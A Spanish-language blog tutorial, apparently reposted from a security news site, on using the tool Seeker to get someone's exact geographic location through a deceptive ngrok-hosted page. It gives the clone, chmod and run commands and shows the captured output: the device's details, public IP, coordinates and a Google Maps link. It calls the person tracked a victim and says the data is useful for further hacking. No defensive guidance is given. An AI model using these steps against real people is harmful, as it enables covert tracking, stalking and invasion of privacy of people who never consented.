Obtener ubicación geográfica de cualquier persona en cuestión de minutos.


La mayoría de las personas han escuchado acerca del phishing, sus objetivos y métodos. Una página de phishing es una falsificación de un sitio web legítimo que busca que el usuario ingrese sus credenciales de acceso para que los atacantes puedan robar el nombre de usuario y contraseña de la víctima. En el caso que presentaremos a continuación, la página de phishing incluso muestra la ubicación actual de la víctima.  

Según expertos en seguridad en redes del Instituto Internacional de Seguridad Cibernética, es muy fácil encontrar la ubicación de cualquier usuario usando una simple página de phishing.  

Hoy le mostraremos una herramienta llamada Seeker, utilizada para obtener la ubicación exacta de un usuario, incluso con datos de longitud y latitud. Si el objetivo está en movimiento, incluso puede mostrar la velocidad a la que se mueve.

El entorno en el que se realizaron estas pruebas es Android 7.0 Nougat. Tenemos abierta la URL del buscador en Android móvil. Y la máquina atacante es Kali Linux 2018.4.

Para clonar, escriba git clone https://github.com/thewhiteh4t/seeker.git
Luego escriba cd seeker
Escriba ls
Primero tiene que cambiar el permiso de dos archivos
Escriba chmod 777 install.sh
Escriba chmod 777 seeker.py
Luego escriba ./install.sh
Escriba python seeker.py
Después de ejecutar la herramienta de consulta anterior, comenzará a utilizar los servicios de ngrok. Seeker creará una URL
root@kali:/home/iicybersecurity/Downloads/seeker# python seeker.py

root@kali:/home/iicybersecurity/Downloads/seeker# python seeker.py
                         _          |  |    
  /  // _ _/ _ \ |  |/ // _ \  _ \  __ \ \  /\  / |    < \  / |  | \/
 /_  > _  >__  >||_ \ _  >|__|
          \/      \/     \/      \/     \/

 
[>] Created By : thewhiteh4t
 [>] Version    : 1.0.9 
 
[+] Checking Internet Connection… Working 
 
[+] Checking For Seeker Updates… Up-to-date 

[+] Starting PHP Server… 
 
[+] Starting Ngrok… 

[+] URL : https://cdf863f9.ngrok.io/nearyou/ 
 
[+] Waiting for User Interaction… 
Después de ejecutar la consulta anterior, se iniciará Seeker. Ahora el objetivo tiene que abrir el enlace anterior en el navegador web.

Abra el enlace anterior que se realiza mediante Seeker en el navegador web móvil. 

Hemos abierto el enlace en el navegador web Lightning

Puede utilizar cualquier navegador web



Abra el navegador web e ingrese el enlace como se muestra a continuación:



Introduzca la URL y vaya a la página web



Haga clic en el icono de continuar, este clic permitirá al atacante acceder a la ubicación de la víctima. Aquí está la página web donde la mayoría de las víctimas caen. Simplemente dan acceso.

El atacante reúne la ubicación del objetivo



Al hacer clic en Aceptar, simplemente cambia la página web, de CONTINUE a COMING SOON



Después de que la víctima otorga permiso a la página web, la siguiente información se recopila en la máquina con Kali Linux que está ejecutando Seeker:
[+] Device Information : 
 
[+] OS         : Android 7.0
 [+] Platform   : Linux armv8l
 [+] CPU Cores  : 8
 [+] RAM        : 2
 [+] GPU Vendor : Qualcomm
 [+] GPU        : Adreno (TM) 506
 [+] Resolution : 360x640
 [+] Browser    : Chrome/71.0.3578.99
 [+] Public IP  : 2405:204:3085:8e13:e037:d2bd:c9dc:220e 
 
[+] Location Information : 

[+] Latitude  : 19.4326 deg
 [+] Longitude : 99.1332 deg
 [+] Accuracy  : 47.027000427246094 m
 [+] Altitude  : 169 m
 [+] Direction : 0 deg
 [+] Speed     : 0 m/s 
 
[+] Google Maps : 
https://www.google.com/maps/place/19%C2%B025'57.4%22N+99%C2%B007'59.5%22E/

[+] Waiting for User Interaction… 
Como puede ver, Seeker ha recopilado gran cantidad de información del objetivo, incluyendo información como plataforma, sistema operativo, RAM, GPU, IP pública.

También puede abrir las coordenadas de Google Maps en el navegador web para ver la ubicación actual del objetivo



La anterior es información vital que puede ser utilizada en otras actividades de hacking.

Fuente:  https://noticiasseguridad.com/

Compartir...

Siguenos en twitter: @disoftin

Publicar un comentario

2 Comentarios

  1. me sale apche/2.4.35(debian) server at e10b7477.ngrok.io port 80

    ResponderEliminar
  2. no me abre dice error con ngrok (line 205 in module ngrok

    ResponderEliminar